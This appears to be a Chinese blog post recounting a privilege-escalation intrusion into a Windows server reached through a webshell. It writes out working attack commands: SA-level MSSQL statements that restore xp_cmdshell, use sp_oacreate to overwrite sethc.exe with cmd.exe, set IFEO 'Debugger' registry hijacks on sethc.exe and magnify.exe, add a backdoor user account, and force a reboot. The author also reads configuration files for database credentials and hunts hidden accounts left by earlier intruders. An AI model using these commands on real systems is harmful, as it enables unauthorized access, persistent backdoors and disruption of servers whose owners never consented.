当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

记一次有趣的提权

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

Shell是双面大牛给的,在我打算看《轩辕剑》的时候,面面大牛说我无聊就让我看看提权,俺立马没了兴趣,为啥,双面大牛都没有搞定的,我能搞定吗..但是发现这个网速看电影真的没用。还是硬着头皮上咯!
 
一看是aspx的,先扫描下开启了什么端口
 


1433,3306,43958对应的MSSQL、MYSQL和Serv-U。
先来看看Serv-U是不是可以提权(PS:要是这么容易就搞定了面面大牛会看上我吗?)。
 


提示:由于目标机器积极拒绝,无法连接。
问面面大牛,说是Serv-U服务暂停了,那这条路堵死了。下面来看看执行命令
 


居然自带的c:\windows\system32\cmd.exe不能执行,那咱们换个可读写的目录上传一个试试
 


然后再执行试试
 


然后继续systeminfo来看看
 


其实吧,重点是补丁信息
 


问面面大牛,他说补丁全满了。菜鸟不信,果断的多次测试,无果..发现面面大牛果然没有说错。
 


他突然说是有人日过了,我就看看留下什么蛛丝马迹没
 


居然还有隐藏的帐号,看来确实是被KO的惨了,经过多次尝试弱口令,和想象的一样,没有进去,话说RP确实是差到了极点。再说也没有那个大牛会留下这样的弱口令吧。既然都死了,那再看看1433了。
 



顺利的找到了配置文件。嘿嘿,还是mssql的,看来有希望啊,可是不是SAa ,啊,麻烦了。管他的,连接去试试呗…
 


吐槽下,这人品,哈哈,其实RP也不差嘛,居然是SA,Microsoft SQL Server 2000。
那么来看看xp_cmdshell是不是存在,直接来增加xp_cmdshell组建
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
 


既然存在,那么就来直接执行命令呗..
Exec master.dbo.xp_cmdshell 'whoami'
 


xpsql.cpp: 错误5 来自CreateProcess(第737 行)
还真没有遇见过。搜索下.遇到这个困扰的,人还不少。原来。错误5是个系统提示的错误号,CreateProcess这个是创建线程的意思,这个错误产生和系统文件cmd.exe有很大的关系,一种情况是cmd被删除,一种是cmd的权限被降低了。
那貌似是路被堵死了,然后想起穿山甲上的执行命令的有两个组建。除了xp_cmdshell外还有sp_oacreate可以执行命令
用cmd替换sethc..
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';
 


无法在库odsole70.dll 中找到函数sp_oacreate。原因: 127(找不到指定的程序。)。然后一直删除了,再恢复后
但是 我再次 使用declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';
无法在库odsole70.dll 中找到函数sp_oacreate。原因: 127(找不到指定的程序。)。
 


原因我也没懂..搞了近乎一个下午。还是无果…
 
翻书的时候突然看见IFEO劫持…
既然我们是介绍IFEO技术相关,那我们就先介绍下: 一,什么是映像胁持(IFEO)? 所谓的IFEO就是Image File Execution Options 在是位于注册表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和local system有权读写修改
 
那就来玩一次IFEO劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\system32\cmd.exe'
 


没有出错…嘿嘿…
那我们来查看是否劫持成功
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
 


DebuggerC:\WINDOWS\system32\cmd.exe
哈哈哈…居然成功了
 


呃…shift不行..
 




 
继续执行
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\system32\cmd.exe'
 


继续执行来查看是否劫持成功
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe','Debugger'
 


我郁闷,还是掉不出来
 


在想是不是系统的被禁用了,于是调用自己上传的cmd
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', @value_name='Debugger', @type='REG_SZ', @value='F:\umail\mysql\cmd.exe'
 


发现自己的也不行,就是弹不出来,涛涛电脑知识网,然后面面牛封装了一个bat上去,发现添加用户也不成功。
然后面面大牛突提示:
 


那继续
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',
@value_name='Debugger',
@type='REG_SZ',
@value='F:\umail\mysql\net1.exe user guset a123456789/ /add'
然后执行查看
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe','Debugger'
 


成功了,但是估计也那啥,不管了,www.xuhantao.com,先看看
 


期间尝试了资源管理器和任务管理都没有成功
 


各种蛋疼
 


还是没有成功
 


好吧,继续
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', @value_name='Debugger', @type='REG_SZ', @value='c:\windows\system32\shutdown -r -t 0'
然后查看
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe','Debugger'
 


但是还是没有重新启动。一个晚上过去了,我还是没有搞定。
早上起来
 


咱们来膜拜下
 




 
 
好吧, 反正是拿下了..
 





 
感谢面面大牛的指导。

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1